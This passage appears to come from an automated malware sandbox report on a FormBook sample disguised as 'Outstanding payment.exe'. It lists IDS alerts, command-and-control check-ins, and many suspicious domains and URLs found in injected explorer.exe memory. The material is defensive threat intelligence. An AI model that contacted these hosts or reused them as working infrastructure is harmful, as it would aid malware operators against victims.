Source: C:\Users\user\Desktop\Outstanding payment.exe	Code function: 4x nop then jmp 09BD59F2h	0_2_09BD555B
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Code function: 4x nop then jmp 05304F52h	11_2_05304ABB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop ebx	15_2_00407B1E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49979 -> 121.254.178.252:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49979 -> 121.254.178.252:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49979 -> 121.254.178.252:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.enelog.xyz/a03d/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.8oosnny.xyz
Source:	DNS query: www.lphatechblog.xyz

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: www.behm.info replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.8oosnny.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.nfluencer-marketing-13524.bond replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.lphatechblog.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.inggraphic.pro replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.oftware-download-92806.bond replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.aja168e.live replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.atidiri.fun replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.otelhafnia.info replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.elnqdjc.shop replaycode: Name error (3)

Uses netstat to query active network connections and open ports

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 10_2_118ADF82 getaddrinfo,setsockopt,recv,

10_2_118ADF82

Source: global traffic	DNS traffic detected: DNS query: www.inggraphic.pro
Source: global traffic	DNS traffic detected: DNS query: www.elnqdjc.shop
Source: global traffic	DNS traffic detected: DNS query: www.8oosnny.xyz
Source: global traffic	DNS traffic detected: DNS query: www.nfluencer-marketing-13524.bond
Source: global traffic	DNS traffic detected: DNS query: www.atidiri.fun
Source: global traffic	DNS traffic detected: DNS query: www.otelhafnia.info
Source: global traffic	DNS traffic detected: DNS query: www.kkkk.shop
Source: global traffic	DNS traffic detected: DNS query: www.aja168e.live
Source: global traffic	DNS traffic detected: DNS query: www.lphatechblog.xyz
Source: global traffic	DNS traffic detected: DNS query: www.oftware-download-92806.bond
Source: global traffic	DNS traffic detected: DNS query: www.behm.info

Source: explorer.exe, 0000000A.00000000.2105292943.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4534821677.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2105292943.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4534821677.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000000A.00000002.4525785289.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2090992450.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 0000000A.00000000.2105292943.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4534821677.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2105292943.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4534821677.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000A.00000000.2105292943.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4534821677.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2105292943.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4534821677.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 0000000A.00000000.2105292943.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4534821677.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2105292943.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4534821677.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000A.00000002.4534821677.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2105292943.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000000A.00000000.2104136768.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2103626523.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4533350845.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: Outstanding payment.exe, 00000000.00000002.2111417638.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, iBSWjb.exe, 0000000B.00000002.2146532412.0000000003309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.72266.vip
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.72266.vip/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.72266.vip/a03d/www.istromarmitaria.online
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.72266.vipReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8oosnny.xyz
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8oosnny.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8oosnny.xyz/a03d/www.nfluencer-marketing-13524.bond
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8oosnny.xyzReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.live
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.live/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.live/a03d/www.duxrib.xyz
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aja168e.liveReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.atidiri.fun
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.atidiri.fun/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.atidiri.fun/a03d/www.otelhafnia.info
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.atidiri.funReferer:
Source: explorer.exe, 0000000A.00000000.2117409581.000000000C8E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3096098347.000000000C8E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3096192758.000000000C8EB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.behm.info
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.behm.info/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.behm.info/a03d/www.enelog.xyz
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.behm.infoReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dj1.lat
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dj1.lat/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dj1.lat/a03d/j
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dj1.latReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyz
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyz/a03d/www.lphatechblog.xyz
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.duxrib.xyzReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elnqdjc.shop
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elnqdjc.shop/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elnqdjc.shop/a03d/www.8oosnny.xyz
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elnqdjc.shopReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyz
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyz/a03d/www.72266.vip
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.enelog.xyzReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.inggraphic.pro
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.inggraphic.pro/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.inggraphic.pro/a03d/www.elnqdjc.shop
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.inggraphic.proReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.istromarmitaria.online
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.istromarmitaria.online/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.istromarmitaria.online/a03d/www.dj1.lat
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.istromarmitaria.onlineReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shop
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shop/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shop/a03d/www.aja168e.live
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kkkk.shopReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lphatechblog.xyz
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lphatechblog.xyz/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lphatechblog.xyz/a03d/www.oftware-download-92806.bond
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lphatechblog.xyzReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nfluencer-marketing-13524.bond
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nfluencer-marketing-13524.bond/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nfluencer-marketing-13524.bond/a03d/www.atidiri.fun
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nfluencer-marketing-13524.bondReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oftware-download-92806.bond
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oftware-download-92806.bond/a03d/
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oftware-download-92806.bond/a03d/www.behm.info
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oftware-download-92806.bondReferer:
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.info
Source: explorer.exe, 0000000A.00000002.4527746233.0000000003545000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097535459.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097638900.0000000003544000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.otelhafnia.info/a03d/
